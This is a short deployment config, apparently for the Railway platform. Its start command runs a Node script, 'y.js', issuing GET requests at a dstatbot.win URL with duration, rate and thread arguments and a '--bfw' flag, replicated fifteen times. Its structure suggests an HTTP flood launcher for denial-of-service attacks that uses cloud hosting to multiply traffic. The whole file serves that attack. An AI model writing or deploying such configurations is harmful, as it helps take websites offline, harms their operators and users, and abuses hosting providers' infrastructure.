[build]
builder = "NIXPACKS"

[deploy]
replicas = 15
startCommand = "node y.js GET https://c1.dstatbot.win/LBRAqyoF  700 8 120 --bfw --debug "
restartPolicyType = "ON_FAILURE"
restartPolicyMaxRetries = 1
